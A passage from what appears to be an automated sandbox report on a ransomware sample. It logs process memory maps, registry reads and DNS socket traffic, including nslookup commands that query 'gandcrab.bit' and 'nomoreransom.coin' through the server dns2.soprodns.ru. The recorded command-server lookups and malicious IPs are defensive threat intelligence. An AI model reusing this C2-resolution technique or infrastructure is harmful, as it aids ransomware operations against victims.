| Socket | Send | flags = NO_FLAG_SET, size = 34, size_out = 34 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 34, size_out = 34 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 31.41.44.99, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 34, size_out = 34 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 34 |
|
1 |
Process #11: nslookup.exe
9
29
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup gandcrab.bit dns2.soprodns.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:12, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x490 |
| Parent PID | 0xbc8 (c:\users\5jghkoaofdp\appdata\roamingeox20.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| nslookup.exe | 0x008e0000 | 0x008f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b5ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b63fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b71fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b72fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b8efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000c10000 | 0x00c10000 | 0x00c13fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c20fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00c31fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00c40000 | 0x00cbdfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00cc0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x00cd0000 | 0x00cf1fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00d9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000eb0000 | 0x00eb0000 | 0x00faffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000fb0000 | 0x00fb0000 | 0x010f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001100000 | 0x01100000 | 0x01287fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| winrnr.dll | 0x74180000 | 0x74188fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74190000 | 0x741a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x741b0000 | 0x741c3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x741d0000 | 0x741dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x743d0000 | 0x74413fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74420000 | 0x74426fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74560000 | 0x745dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x745e0000 | 0x745e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x745f0000 | 0x7460dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x748d0000 | 0x74914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74dd0000 | 0x74e22fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74e30000 | 0x74e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74e40000 | 0x74e5cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74f70000 | 0x75020fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75180000 | 0x752cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75320000 | 0x7536cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76520000 | 0x7665ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766f0000 | 0x767befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x76880000 | 0x7693dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76940000 | 0x7697dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x76bc0000 | 0x76cc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x76cd0000 | 0x76dc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76e60000 | 0x76e84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76fe0000 | 0x76fe6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x77340000 | 0x77388fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x77390000 | 0x77398fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x773a0000 | 0x77407fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77410000 | 0x77577fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007e430000 | 0x7e430000 | 0x7e52ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007e530000 | 0x7e530000 | 0x7e552fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007e55b000 | 0x7e55b000 | 0x7e55bfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007e55c000 | 0x7e55c000 | 0x7e55cfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007e55d000 | 0x7e55d000 | 0x7e55ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc731fffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc733aa000 | 0x7ffc733aa000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x4a0
9
29
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x8e0000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = FiVauf |
|
1 | |
| DNS | Resolve Name | host = dns2.soprodns.ru, address_out = 94.103.82.89 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 43, size_out = 43 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 43 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 30, size_out = 30 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 30, size_out = 30 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 30, size_out = 30 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 30, size_out = 30 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 52 |
|
1 |
Process #13: nslookup.exe
8
19
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup nomoreransom.coin dns2.soprodns.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:13, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:33 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x848 |
| Parent PID | 0xbc8 (c:\users\5jghkoaofdp\appdata\roamingeox20.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
844
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| nslookup.exe | 0x008e0000 | 0x008f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x00cbffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00cd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ceefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00d2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000d70000 | 0x00d70000 | 0x00d73fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x00d80fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00d91fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00da0000 | 0x00e1dfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000e20000 | 0x00e20000 | 0x00e20fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x0105ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001060000 | 0x01060000 | 0x011a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0124ffff | Private Memory | Readable, Writable |
|
|
|
- |
| winrnr.dll | 0x74180000 | 0x74188fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74190000 | 0x741a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x741b0000 | 0x741c3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x741d0000 | 0x741dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x743d0000 | 0x74413fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74420000 | 0x74426fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74560000 | 0x745dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x745e0000 | 0x745e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x745f0000 | 0x7460dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x748d0000 | 0x74914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74dd0000 | 0x74e22fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74e30000 | 0x74e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74e40000 | 0x74e5cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74f70000 | 0x75020fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75320000 | 0x7536cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76520000 | 0x7665ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766f0000 | 0x767befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x76880000 | 0x7693dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76940000 | 0x7697dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76fe0000 | 0x76fe6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x77340000 | 0x77388fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x77390000 | 0x77398fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x773a0000 | 0x77407fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77410000 | 0x77577fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007e700000 | 0x7e700000 | 0x7e7fffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007e800000 | 0x7e800000 | 0x7e822fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007e824000 | 0x7e824000 | 0x7e824fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007e82a000 | 0x7e82a000 | 0x7e82cfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007e82d000 | 0x7e82d000 | 0x7e82dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc731fffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc733aa000 | 0x7ffc733aa000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x844
8
19
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x8e0000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = FiVauf |
|
1 | |
| DNS | Resolve Name | host = dns2.soprodns.ru, address_out = 94.103.82.89 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 43, size_out = 43 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 43 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 51 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 94.103.82.89, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 109 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 |
